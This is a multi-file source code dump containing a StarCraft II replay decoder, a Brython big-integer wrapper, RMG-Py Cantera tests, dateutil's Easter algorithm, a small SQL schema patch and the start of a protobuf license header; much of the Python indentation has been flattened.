('_struct',[[('m_unitLink',79,-4),('m_subgroupPriority',10,-3),('m_intraSubgroupPriority',10,-2),('m_count',99,-1)]]), #103
('_array',[(0,9),103]), #104
('_struct',[[('m_subgroupIndex',99,-4),('m_removeMask',102,-3),('m_addSubgroups',104,-2),('m_addUnitTags',64,-1)]]), #105
('_struct',[[('m_controlGroupId',1,-2),('m_delta',105,-1)]]), #106
('_struct',[[('m_controlGroupIndex',1,-3),('m_controlGroupUpdate',12,-2),('m_mask',102,-1)]]), #107
('_struct',[[('m_count',99,-6),('m_subgroupCount',99,-5),('m_activeSubgroupIndex',99,-4),('m_unitTagsChecksum',6,-3),('m_subgroupIndicesChecksum',6,-2),('m_subgroupsChecksum',6,-1)]]), #108
('_struct',[[('m_controlGroupId',1,-2),('m_selectionSyncData',108,-1)]]), #109
('_struct',[[('m_chatMessage',29,-1)]]), #110
('_struct',[[('m_speed',12,-1)]]), #111
('_int',[(-128,8)]), #112
('_struct',[[('m_delta',112,-1)]]), #113
('_struct',[[('x',87,-2),('y',87,-1)]]), #114
('_struct',[[('m_point',114,-4),('m_unit',6,-3),('m_pingedMinimap',13,-2),('m_option',87,-1)]]), #115
('_struct',[[('m_verb',29,-2),('m_arguments',29,-1)]]), #116
('_struct',[[('m_alliance',6,-2),('m_control',6,-1)]]), #117
('_struct',[[('m_unitTag',6,-1)]]), #118
('_struct',[[('m_unitTag',6,-2),('m_flags',10,-1)]]), #119
('_struct',[[('m_conversationId',87,-2),('m_replyId',87,-1)]]), #120
('_optional',[20]), #121
('_struct',[[('m_gameUserId',1,-6),('m_observe',24,-5),('m_name',9,-4),('m_toonHandle',121,-3),('m_clanTag',41,-2),('m_clanLogo',42,-1)]]), #122
('_array',[(0,5),122]), #123
('_int',[(0,1)]), #124
('_struct',[[('m_userInfos',123,-2),('m_method',124,-1)]]), #125
('_choice',[(0,3),{0:('None',85),1:('Checked',13),2:('ValueChanged',6),3:('SelectionChanged',87),4:('TextChanged',30),5:('MouseButton',6)}]), #126
('_struct',[[('m_controlId',87,-3),('m_eventType',87,-2),('m_eventData',126,-1)]]), #127
('_struct',[[('m_soundHash',6,-2),('m_length',6,-1)]]), #128
('_array',[(0,7),6]), #129
('_struct',[[('m_soundHash',129,-2),('m_length',129,-1)]]), #130
('_struct',[[('m_syncInfo',130,-1)]]), #131
('_struct',[[('m_queryId',79,-3),('m_lengthMs',6,-2),('m_finishGameLoop',6,-1)]]), #132
('_struct',[[('m_queryId',79,-2),('m_lengthMs',6,-1)]]), #133
('_struct',[[('m_animWaitQueryId',79,-1)]]), #134
('_struct',[[('m_sound',6,-1)]]), #135
('_struct',[[('m_transmissionId',87,-2),('m_thread',6,-1)]]), #136
('_struct',[[('m_transmissionId',87,-1)]]), #137
('_optional',[80]), #138
('_optional',[79]), #139
('_optional',[112]), #140
('_struct',[[('m_target',138,-6),('m_distance',139,-5),('m_pitch',139,-4),('m_yaw',139,-3),('m_reason',140,-2),('m_follow',13,-1)]]), #141
('_struct',[[('m_skipType',124,-1)]]), #142
('_int',[(0,11)]), #143
('_struct',[[('x',143,-2),('y',143,-1)]]), #144
('_struct',[[('m_button',6,-5),('m_down',13,-4),('m_posUI',144,-3),('m_posWorld',88,-2),('m_flags',112,-1)]]), #145
('_struct',[[('m_posUI',144,-3),('m_posWorld',88,-2),('m_flags',112,-1)]]), #146
('_struct',[[('m_achievementLink',79,-1)]]), #147
('_struct',[[('m_hotkey',6,-2),('m_down',13,-1)]]), #148
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_state',112,-1)]]), #149
('_struct',[[('m_soundtrack',6,-1)]]), #150
('_struct',[[('m_key',112,-2),('m_flags',112,-1)]]), #151
('_struct',[[('m_error',87,-2),('m_abil',95,-1)]]), #152
('_int',[(0,19)]), #153
('_struct',[[('m_decrementMs',153,-1)]]), #154
('_struct',[[('m_portraitId',87,-1)]]), #155
('_struct',[[('m_functionName',20,-1)]]), #156
('_struct',[[('m_result',87,-1)]]), #157
('_struct',[[('m_gameMenuItemIndex',87,-1)]]), #158
('_int',[(-32768,16)]), #159
('_struct',[[('m_wheelSpin',159,-2),('m_flags',112,-1)]]), #160
('_struct',[[('m_button',79,-1)]]), #161
('_struct',[[('m_cutsceneId',87,-2),('m_bookmarkName',20,-1)]]), #162
('_struct',[[('m_cutsceneId',87,-1)]]), #163
('_struct',[[('m_cutsceneId',87,-3),('m_conversationLine',20,-2),('m_altConversationLine',20,-1)]]), #164
('_struct',[[('m_cutsceneId',87,-2),('m_conversationLine',20,-1)]]), #165
('_struct',[[('m_leaveReason',1,-1)]]), #166
('_struct',[[('m_observe',24,-7),('m_name',9,-6),('m_toonHandle',121,-5),('m_clanTag',41,-4),('m_clanLogo',42,-3),('m_hijack',13,-2),('m_hijackCloneGameUserId',59,-1)]]), #167
('_optional',[83]), #168
('_struct',[[('m_state',24,-2),('m_sequence',168,-1)]]), #169
('_struct',[[('m_sequence',168,-2),('m_target',88,-1)]]), #170
('_struct',[[('m_sequence',168,-2),('m_target',89,-1)]]), #171
('_struct',[[('m_catalog',10,-4),('m_entry',79,-3),('m_field',9,-2),('m_value',9,-1)]]), #172
('_struct',[[('m_index',6,-1)]]), #173
('_struct',[[('m_shown',13,-1)]]), #174
('_struct',[[('m_recipient',12,-2),('m_string',30,-1)]]), #175
('_struct',[[('m_recipient',12,-2),('m_point',114,-1)]]), #176
('_struct',[[('m_progress',87,-1)]]), #177
('_struct',[[('m_status',24,-1)]]), #178
('_struct',[[('m_abilLink',79,-3),('m_abilCmdIndex',2,-2),('m_buttonLink',79,-1)]]), #179
('_struct',[[('m_behaviorLink',79,-2),('m_buttonLink',79,-1)]]), #180
('_choice',[(0,2),{0:('None',85),1:('Ability',179),2:('Behavior',180),3:('Vitals',159)}]), #181
('_struct',[[('m_announcement',181,-4),('m_announceLink',79,-3),('m_otherUnitTag',6,-2),('m_unitTag',6,-1)]]), #182
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_unitTypeName',29,2),('m_controlPlayerId',1,3),('m_upkeepPlayerId',1,4),('m_x',10,5),('m_y',10,6)]]), #183
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_x',10,2),('m_y',10,3)]]), #184
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_killerPlayerId',59,2),('m_x',10,3),('m_y',10,4),('m_killerUnitTagIndex',43,5),('m_killerUnitTagRecycle',43,6)]]), #185
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_controlPlayerId',1,2),('m_upkeepPlayerId',1,3)]]), #186
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1),('m_unitTypeName',29,2)]]), #187
('_struct',[[('m_playerId',1,0),('m_upgradeTypeName',29,1),('m_count',87,2)]]), #188
('_struct',[[('m_unitTagIndex',6,0),('m_unitTagRecycle',6,1)]]), #189
('_array',[(0,10),87]), #190
('_struct',[[('m_firstUnitIndex',6,0),('m_items',190,1)]]), #191
('_struct',[[('m_playerId',1,0),('m_type',6,1),('m_userId',43,2),('m_slotId',43,3)]]), #192
('_struct',[[('m_key',29,0)]]), #193
('_struct',[[('__parent',193,0),('m_value',29,1)]]), #194
('_array',[(0,6),194]), #195
('_optional',[195]), #196
('_struct',[[('__parent',193,0),('m_value',87,1)]]), #197
('_array',[(0,6),197]), #198
('_optional',[198]), #199
('_struct',[[('m_eventName',29,0),('m_stringData',196,1),('m_intData',199,2),('m_fixedData',199,3)]]), #200
('_struct',[[('m_value',6,0),('m_time',6,1)]]), #201
('_array',[(0,6),201]), #202
('_array',[(0,5),202]), #203
('_struct',[[('m_name',29,0),('m_values',203,1)]]), #204
('_array',[(0,21),204]), #205
('_struct',[[('m_instanceList',205,0)]]), #206
]
# Map from protocol NNet.Game.*Event eventid to (typeid, name)
game_event_types = {
5: (78, 'NNet.Game.SUserFinishedLoadingSyncEvent'),
7: (77, 'NNet.Game.SUserOptionsEvent'),
9: (70, 'NNet.Game.SBankFileEvent'),
10: (72, 'NNet.Game.SBankSectionEvent'),
11: (73, 'NNet.Game.SBankKeyEvent'),
12: (74, 'NNet.Game.SBankValueEvent'),
13: (76, 'NNet.Game.SBankSignatureEvent'),
14: (81, 'NNet.Game.SCameraSaveEvent'),
21: (82, 'NNet.Game.SSaveGameEvent'),
22: (78, 'NNet.Game.SSaveGameDoneEvent'),
23: (78, 'NNet.Game.SLoadGameDoneEvent'),
25: (84, 'NNet.Game.SCommandManagerResetEvent'),
26: (92, 'NNet.Game.SGameCheatEvent'),
27: (98, 'NNet.Game.SCmdEvent'),
28: (106, 'NNet.Game.SSelectionDeltaEvent'),
29: (107, 'NNet.Game.SControlGroupUpdateEvent'),
30: (109, 'NNet.Game.SSelectionSyncCheckEvent'),
32: (110, 'NNet.Game.STriggerChatMessageEvent'),
34: (111, 'NNet.Game.SSetAbsoluteGameSpeedEvent'),
35: (113, 'NNet.Game.SAddAbsoluteGameSpeedEvent'),
36: (115, 'NNet.Game.STriggerPingEvent'),
37: (116, 'NNet.Game.SBroadcastCheatEvent'),
38: (117, 'NNet.Game.SAllianceEvent'),
39: (118, 'NNet.Game.SUnitClickEvent'),
40: (119, 'NNet.Game.SUnitHighlightEvent'),
41: (120, 'NNet.Game.STriggerReplySelectedEvent'),
43: (125, 'NNet.Game.SHijackReplayGameEvent'),
44: (78, 'NNet.Game.STriggerSkippedEvent'),
45: (128, 'NNet.Game.STriggerSoundLengthQueryEvent'),
46: (135, 'NNet.Game.STriggerSoundOffsetEvent'),
47: (136, 'NNet.Game.STriggerTransmissionOffsetEvent'),
48: (137, 'NNet.Game.STriggerTransmissionCompleteEvent'),
49: (141, 'NNet.Game.SCameraUpdateEvent'),
50: (78, 'NNet.Game.STriggerAbortMissionEvent'),
55: (127, 'NNet.Game.STriggerDialogControlEvent'),
56: (131, 'NNet.Game.STriggerSoundLengthSyncEvent'),
57: (142, 'NNet.Game.STriggerConversationSkippedEvent'),
58: (145, 'NNet.Game.STriggerMouseClickedEvent'),
59: (146, 'NNet.Game.STriggerMouseMovedEvent'),
60: (147, 'NNet.Game.SAchievementAwardedEvent'),
61: (148, 'NNet.Game.STriggerHotkeyPressedEvent'),
62: (149, 'NNet.Game.STriggerTargetModeUpdateEvent'),
64: (150, 'NNet.Game.STriggerSoundtrackDoneEvent'),
66: (151, 'NNet.Game.STriggerKeyPressedEvent'),
67: (156, 'NNet.Game.STriggerMovieFunctionEvent'),
76: (152, 'NNet.Game.STriggerCommandErrorEvent'),
86: (78, 'NNet.Game.STriggerMovieStartedEvent'),
87: (78, 'NNet.Game.STriggerMovieFinishedEvent'),
88: (154, 'NNet.Game.SDecrementGameTimeRemainingEvent'),
89: (155, 'NNet.Game.STriggerPortraitLoadedEvent'),
90: (157, 'NNet.Game.STriggerCustomDialogDismissedEvent'),
91: (158, 'NNet.Game.STriggerGameMenuItemSelectedEvent'),
92: (160, 'NNet.Game.STriggerMouseWheelEvent'),
95: (161, 'NNet.Game.STriggerButtonPressedEvent'),
96: (78, 'NNet.Game.STriggerGameCreditsFinishedEvent'),
97: (162, 'NNet.Game.STriggerCutsceneBookmarkFiredEvent'),
98: (163, 'NNet.Game.STriggerCutsceneEndSceneFiredEvent'),
99: (164, 'NNet.Game.STriggerCutsceneConversationLineEvent'),
100: (165, 'NNet.Game.STriggerCutsceneConversationLineMissingEvent'),
101: (166, 'NNet.Game.SGameUserLeaveEvent'),
102: (167, 'NNet.Game.SGameUserJoinEvent'),
103: (169, 'NNet.Game.SCommandManagerStateEvent'),
104: (170, 'NNet.Game.SCmdUpdateTargetPointEvent'),
105: (171, 'NNet.Game.SCmdUpdateTargetUnitEvent'),
106: (132, 'NNet.Game.STriggerAnimLengthQueryByNameEvent'),
107: (133, 'NNet.Game.STriggerAnimLengthQueryByPropsEvent'),
108: (134, 'NNet.Game.STriggerAnimOffsetEvent'),
109: (172, 'NNet.Game.SCatalogModifyEvent'),
110: (173, 'NNet.Game.SHeroTalentTreeSelectedEvent'),
111: (78, 'NNet.Game.STriggerProfilerLoggingFinishedEvent'),
112: (174, 'NNet.Game.SHeroTalentTreeSelectionPanelToggledEvent'),
}
# The typeid of the NNet.Game.EEventId enum.
game_eventid_typeid = 0
# Map from protocol NNet.Game.*Message eventid to (typeid, name)
message_event_types = {
0: (175, 'NNet.Game.SChatMessage'),
1: (176, 'NNet.Game.SPingMessage'),
2: (177, 'NNet.Game.SLoadingProgressMessage'),
3: (78, 'NNet.Game.SServerPingMessage'),
4: (178, 'NNet.Game.SReconnectNotifyMessage'),
5: (182, 'NNet.Game.SPlayerAnnounceMessage'),
}
# The typeid of the NNet.Game.EMessageId enum.
message_eventid_typeid = 1
# Map from protocol NNet.Replay.Tracker.*Event eventid to (typeid, name)
tracker_event_types = {
1: (183, 'NNet.Replay.Tracker.SUnitBornEvent'),
2: (185, 'NNet.Replay.Tracker.SUnitDiedEvent'),
3: (186, 'NNet.Replay.Tracker.SUnitOwnerChangeEvent'),
4: (187, 'NNet.Replay.Tracker.SUnitTypeChangeEvent'),
5: (188, 'NNet.Replay.Tracker.SUpgradeEvent'),
6: (183, 'NNet.Replay.Tracker.SUnitInitEvent'),
7: (189, 'NNet.Replay.Tracker.SUnitDoneEvent'),
8: (191, 'NNet.Replay.Tracker.SUnitPositionsEvent'),
9: (192, 'NNet.Replay.Tracker.SPlayerSetupEvent'),
10: (200, 'NNet.Replay.Tracker.SStatGameEvent'),
11: (206, 'NNet.Replay.Tracker.SScoreResultEvent'),
12: (184, 'NNet.Replay.Tracker.SUnitRevivedEvent'),
}
# The typeid of the NNet.Replay.Tracker.EEventId enum.
tracker_eventid_typeid = 2
# The typeid of NNet.SVarUint32 (the type used to encode gameloop deltas).
svaruint32_typeid = 7
# The typeid of NNet.Replay.SGameUserId (the type used to encode player ids).
replay_userid_typeid = 8
# The typeid of NNet.Replay.SHeader (the type used to store replay game version and length).
replay_header_typeid = 18
# The typeid of NNet.Game.SDetails (the type used to store overall replay details).
game_details_typeid = 40
# The typeid of NNet.Replay.SInitData (the type used to store the initial lobby).
replay_initdata_typeid = 69
def _varuint32_value(value):
# Returns the numeric value from a SVarUint32 instance.
for k,v in value.iteritems():
return v
return 0
def _decode_event_stream(decoder, eventid_typeid, event_types, decode_user_id):
# Decodes events prefixed with a gameloop and possibly userid
gameloop = 0
while not decoder.done():
start_bits = decoder.used_bits()
# decode the gameloop delta before each event
delta = _varuint32_value(decoder.instance(svaruint32_typeid))
gameloop += delta
# decode the userid before each event
if decode_user_id:
userid = decoder.instance(replay_userid_typeid)
# decode the event id
eventid = decoder.instance(eventid_typeid)
typeid, typename = event_types.get(eventid, (None, None))
if typeid is None:
raise CorruptedError('eventid(%d) at %s' % (eventid, decoder))
# decode the event struct instance
event = decoder.instance(typeid)
event['_event'] = typename
event['_eventid'] = eventid
# insert gameloop and userid
event['_gameloop'] = gameloop
if decode_user_id:
event['_userid'] = userid
# the next event is byte aligned
decoder.byte_align()
# insert bits used in stream
event['_bits'] = decoder.used_bits() - start_bits
yield event
def decode_replay_game_events(contents):
"""Decodes and yields each game event from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
game_eventid_typeid,
game_event_types,
decode_user_id=True):
yield event
def decode_replay_message_events(contents):
"""Decodes and yields each message event from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
message_eventid_typeid,
message_event_types,
decode_user_id=True):
yield event
def decode_replay_tracker_events(contents):
"""Decodes and yields each tracker event from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
for event in _decode_event_stream(decoder,
tracker_eventid_typeid,
tracker_event_types,
decode_user_id=False):
yield event
def decode_replay_header(contents):
"""Decodes and return the replay header from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
return decoder.instance(replay_header_typeid)
def decode_replay_details(contents):
"""Decodes and returns the game details from the contents byte string."""
decoder = VersionedDecoder(contents, typeinfos)
return decoder.instance(game_details_typeid)
def decode_replay_initdata(contents):
"""Decodes and return the replay init data from the contents byte string."""
decoder = BitPackedDecoder(contents, typeinfos)
return decoder.instance(replay_initdata_typeid)
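# Illustrative sketch: the byte strings fed to the decoders above are
# normally extracted from a replay's MPQ archive, e.g. with the mpyq
# package (the file name here is a made-up example):
#
#   import mpyq
#   archive = mpyq.MPQArchive('example.StormReplay')
#   header = decode_replay_header(
#       archive.header['user_data_header']['content'])
#   details = decode_replay_details(archive.read_file('replay.details'))
#   for event in decode_replay_tracker_events(
#           archive.read_file('replay.tracker.events')):
#       print(event['_event'], event['_gameloop'])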
def decode_replay_attributes_events(contents):
"""Decodes and yields each attribute from the contents byte string."""
buffer = BitPackedBuffer(contents, 'little')
attributes = {}
if not buffer.done():
attributes['source'] = buffer.read_bits(8)
attributes['mapNamespace'] = buffer.read_bits(32)
count = buffer.read_bits(32)
attributes['scopes'] = {}
while not buffer.done():
value = {}
value['namespace'] = buffer.read_bits(32)
value['attrid'] = attrid = buffer.read_bits(32)
scope = buffer.read_bits(8)
value['value'] = buffer.read_aligned_bytes(4)[::-1].strip('\x00')
        if scope not in attributes['scopes']:
            attributes['scopes'][scope] = {}
        if attrid not in attributes['scopes'][scope]:
            attributes['scopes'][scope][attrid] = []
attributes['scopes'][scope][attrid].append(value)
return attributes
def unit_tag(unitTagIndex, unitTagRecycle):
return (unitTagIndex << 18) + unitTagRecycle
def unit_tag_index(unitTag):
return (unitTag >> 18) & 0x00003fff
def unit_tag_recycle(unitTag):
return (unitTag) & 0x0003ffff
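# Illustrative sketch: a unit tag packs a 14-bit index above an 18-bit
# recycle counter, so the three helpers above round-trip exactly.
if __name__ == '__main__':
    tag = unit_tag(5, 7)  # (5 << 18) + 7 == 1310727
    assert unit_tag_index(tag) == 5
    assert unit_tag_recycle(tag) == 7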
| mit |
40223139/39g7test | static/Brython3.1.1-20150328-091302/Lib/long_int1/__init__.py | 503 | 3858 | from browser import html, document, window
import javascript
# memoize/cache?
def _get_value(other):
if isinstance(other, LongInt):
return other.value
return other
class BigInt:
def __init__(self):
pass
def __abs__(self):
return LongInt(self.value.abs())
def __add__(self, other):
return LongInt(self.value.plus(_get_value(other)))
def __and__(self, other):
pass
def __divmod__(self, other):
_value=_get_value(other)
return LongInt(self.value.div(_value)), LongInt(self.value.mod(_value))
def __div__(self, other):
return LongInt(self.value.div(_get_value(other)))
def __eq__(self, other):
return bool(self.value.eq(_get_value(other)))
def __floordiv__(self, other):
return LongInt(self.value.div(_get_value(other)).floor())
def __ge__(self, other):
return bool(self.value.gte(_get_value(other)))
def __gt__(self, other):
return bool(self.value.gt(_get_value(other)))
def __index__(self):
if self.value.isInt():
return int(self.value.toNumber())
raise TypeError("This is not an integer")
def __le__(self, other):
return bool(self.value.lte(_get_value(other)))
def __lt__(self, other):
return bool(self.value.lt(_get_value(other)))
def __lshift__(self, shift):
if isinstance(shift, int):
_v=LongInt(2)**shift
return LongInt(self.value.times(_v.value))
def __mod__(self, other):
return LongInt(self.value.mod(_get_value(other)))
def __mul__(self, other):
return LongInt(self.value.times(_get_value(other)))
    def __neg__(self):
        # unary minus takes no operand; multiply by -1, which all three JS backends support
        return LongInt(self.value.times(-1))
def __or__(self, other):
pass
def __pow__(self, other):
return LongInt(self.value.pow(_get_value(other)))
def __rshift__(self, other):
pass
def __sub__(self, other):
return LongInt(self.value.minus(_get_value(other)))
    def __repr__(self):
        return "%s(%s)" % (self.__class__.__name__, self.value.toString(10))
    def __str__(self):
        return "%s(%s)" % (self.__class__.__name__, self.value.toString(10))
def __xor__(self, other):
pass
_precision=20
def get_precision(value):
if isinstance(value, LongInt):
return len(str(value.value.toString(10)))
return len(str(value))
class DecimalJS(BigInt):
def __init__(self, value=0, base=10):
global _precision
_prec=get_precision(value)
if _prec > _precision:
_precision=_prec
window.eval('Decimal.precision=%s' % _precision)
self.value=javascript.JSConstructor(window.Decimal)(value, base)
class BigNumberJS(BigInt):
def __init__(self, value=0, base=10):
self.value=javascript.JSConstructor(window.BigNumber)(value, base)
class BigJS(BigInt):
def __init__(self, value=0, base=10):
self.value=javascript.JSConstructor(window.Big)(value, base)
def __floordiv__(self, other):
_v=LongInt(self.value.div(_get_value(other)))
if _v >= 0:
return LongInt(_v.value.round(0, 0)) #round down
return LongInt(_v.value.round(0, 3)) #round up
def __pow__(self, other):
if isinstance(other, LongInt):
_value=int(other.value.toString(10))
elif isinstance(other, str):
_value=int(other)
return LongInt(self.value.pow(_value))
#_path = __file__[:__file__.rfind('/')]+'/'
_path = __BRYTHON__.brython_path + 'Lib/long_int1/'
#to use decimal.js library uncomment these 2 lines
#javascript.load(_path+'decimal.min.js', ['Decimal'])
#LongInt=DecimalJS
#to use bignumber.js library uncomment these 2 lines
javascript.load(_path+'bignumber.min.js', ['BigNumber'])
LongInt=BigNumberJS
#big.js does not have a "base" so only base 10 stuff works.
#to use big.js library uncomment these 2 lines
#javascript.load(_path+'big.min.js', ['Big'])
#LongInt=BigJS
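# Illustrative sketch: LongInt wraps a JavaScript bignum object, so the
# lines below only run inside a Brython page that has loaded one of the
# libraries above (the values are made-up examples):
#
#   n = LongInt('123456789012345678901234567890')
#   assert n + 1 > n
#   assert (LongInt(2) ** 64) % 10 == LongInt(6)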
| gpl-3.0 |
chatelak/RMG-Py | rmgpy/tools/canteraTest.py | 7 | 3597 | import unittest
import os
import numpy
from rmgpy.tools.canteraModel import findIgnitionDelay, CanteraCondition, Cantera
from rmgpy.quantity import Quantity
import rmgpy
class CanteraTest(unittest.TestCase):
def testIgnitionDelay(self):
"""
Test that findIgnitionDelay() works.
"""
t = numpy.arange(0,5,0.5)
P = numpy.array([0,0.33,0.5,0.9,2,4,15,16,16.1,16.2])
OH = numpy.array([0,0.33,0.5,0.9,2,4,15,16,7,2])
CO = OH*0.9
t_ign = findIgnitionDelay(t,P)
self.assertEqual(t_ign,2.75)
t_ign = findIgnitionDelay(t,OH,'maxHalfConcentration')
self.assertEqual(t_ign,3)
t_ign = findIgnitionDelay(t,[OH,CO], 'maxSpeciesConcentrations')
self.assertEqual(t_ign,3.5)
def testRepr(self):
"""
Test that the repr function for a CanteraCondition object can reconstitute
the same object
"""
reactorType='IdealGasReactor'
molFrac={'CC': 0.05, '[Ar]': 0.95}
P=(3,'atm')
T=(1500,'K')
terminationTime=(5e-5,'s')
condition = CanteraCondition(reactorType,
terminationTime,
molFrac,
T0=T,
P0=P)
reprCondition=eval(condition.__repr__())
self.assertEqual(reprCondition.T0.value_si,Quantity(T).value_si)
self.assertEqual(reprCondition.P0.value_si,Quantity(P).value_si)
self.assertEqual(reprCondition.V0,None)
self.assertEqual(reprCondition.molFrac,molFrac)
class RMGToCanteraTest(unittest.TestCase):
"""
Contains unit tests for the conversion of RMG species and reaction objects to Cantera objects.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
from rmgpy.chemkin import loadChemkinFile
folder = os.path.join(os.path.dirname(rmgpy.__file__),'tools/data/various_kinetics')
chemkinPath = os.path.join(folder, 'chem_annotated.inp')
dictionaryPath = os.path.join(folder, 'species_dictionary.txt')
transportPath = os.path.join(folder, 'tran.dat')
species, reactions = loadChemkinFile(chemkinPath, dictionaryPath,transportPath)
self.rmg_ctSpecies = [spec.toCantera() for spec in species]
self.rmg_ctReactions = []
for rxn in reactions:
convertedReactions = rxn.toCantera(species)
if isinstance(convertedReactions,list):
self.rmg_ctReactions.extend(convertedReactions)
else:
self.rmg_ctReactions.append(convertedReactions)
job = Cantera()
job.loadChemkinModel(chemkinPath, transportFile=transportPath,quiet=True)
self.ctSpecies = job.model.species()
self.ctReactions = job.model.reactions()
def testSpeciesConversion(self):
"""
Test that species objects convert properly
"""
from rmgpy.tools.canteraModel import checkEquivalentCanteraSpecies
for i in range(len(self.ctSpecies)):
self.assertTrue(checkEquivalentCanteraSpecies(self.ctSpecies[i],self.rmg_ctSpecies[i]))
def testReactionConversion(self):
"""
        Test that reaction objects convert properly
"""
from rmgpy.tools.canteraModel import checkEquivalentCanteraReaction
for i in range(len(self.ctReactions)):
self.assertTrue(checkEquivalentCanteraReaction(self.ctReactions[i],self.rmg_ctReactions[i]))
| mit |
qyuz/reXChat | dateutil/easter.py | 291 | 2633 | """
Copyright (c) 2003-2007 Gustavo Niemeyer <[email protected]>
This module offers extensions to the standard python 2.3+
datetime module.
"""
__author__ = "Gustavo Niemeyer <[email protected]>"
__license__ = "PSF License"
import datetime
__all__ = ["easter", "EASTER_JULIAN", "EASTER_ORTHODOX", "EASTER_WESTERN"]
EASTER_JULIAN = 1
EASTER_ORTHODOX = 2
EASTER_WESTERN = 3
def easter(year, method=EASTER_WESTERN):
"""
This method was ported from the work done by GM Arts,
on top of the algorithm by Claus Tondering, which was
    based in part on the algorithm of Oudin (1940), as
quoted in "Explanatory Supplement to the Astronomical
Almanac", P. Kenneth Seidelmann, editor.
This algorithm implements three different easter
calculation methods:
1 - Original calculation in Julian calendar, valid in
dates after 326 AD
2 - Original method, with date converted to Gregorian
calendar, valid in years 1583 to 4099
3 - Revised method, in Gregorian calendar, valid in
years 1583 to 4099 as well
These methods are represented by the constants:
EASTER_JULIAN = 1
EASTER_ORTHODOX = 2
EASTER_WESTERN = 3
The default method is method 3.
More about the algorithm may be found at:
http://users.chariot.net.au/~gmarts/eastalg.htm
and
http://www.tondering.dk/claus/calendar.html
"""
if not (1 <= method <= 3):
raise ValueError, "invalid method"
# g - Golden year - 1
# c - Century
# h - (23 - Epact) mod 30
# i - Number of days from March 21 to Paschal Full Moon
# j - Weekday for PFM (0=Sunday, etc)
# p - Number of days from March 21 to Sunday on or before PFM
# (-6 to 28 methods 1 & 3, to 56 for method 2)
# e - Extra days to add for method 2 (converting Julian
# date to Gregorian date)
y = year
g = y % 19
e = 0
if method < 3:
# Old method
i = (19*g+15)%30
j = (y+y//4+i)%7
if method == 2:
            # Extra days to convert Julian to Gregorian date
e = 10
if y > 1600:
e = e+y//100-16-(y//100-16)//4
else:
# New method
c = y//100
h = (c-c//4-(8*c+13)//25+19*g+15)%30
i = h-(h//28)*(1-(h//28)*(29//(h+1))*((21-g)//11))
j = (y+y//4+i+2-c+c//4)%7
# p can be from -6 to 56 corresponding to dates 22 March to 23 May
# (later dates apply to method 2, although 23 May never actually occurs)
p = i-j+e
d = 1+(p+27+(p+6)//40)%31
m = 3+(p+26)//30
return datetime.date(int(y),int(m),int(d))
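# Illustrative sanity check against well-known dates: Western Easter
# 2024 fell on March 31 and Orthodox Easter 2024 on May 5.
if __name__ == '__main__':
    assert easter(2024) == datetime.date(2024, 3, 31)
    assert easter(2024, EASTER_ORTHODOX) == datetime.date(2024, 5, 5)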
| gpl-2.0 |
indradhanush/filesync-server | src/backends/db/schemas/fsync_shard/patch_11.py | 6 | 1270 | # Copyright 2008-2015 Canonical
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further info, check http://launchpad.net/filesync-server
"""Add ObjectsToDelete table for the dead nodes cleanup scripts.
This table will be used until we can use temporary tables via pgbouncer or
directly talking to the shards.
"""
SQL = ["CREATE TABLE ObjectsToDelete (id uuid, content_hash BYTEA)",
"CREATE INDEX objectstodelete_idx ON ObjectsToDelete(id)",
"GRANT SELECT,INSERT,DELETE,UPDATE,TRUNCATE ON TABLE ObjectsToDelete TO"
" storage, webapp;"]
def apply(store):
"""Apply the patch."""
for sql in SQL:
store.execute(sql)
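# Illustrative sketch: apply() only needs an object with an execute()
# method, so the patch can be exercised with a stand-in store.
if __name__ == '__main__':
    class FakeStore(object):
        def __init__(self):
            self.executed = []
        def execute(self, sql):
            self.executed.append(sql)
    store = FakeStore()
    apply(store)
    assert store.executed == SQL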
| agpl-3.0 |
kku1993/libquic | src/third_party/protobuf/python/google/protobuf/service_reflection.py | 243 | 11023 | # Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# https://developers.google.com/protocol-buffers/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
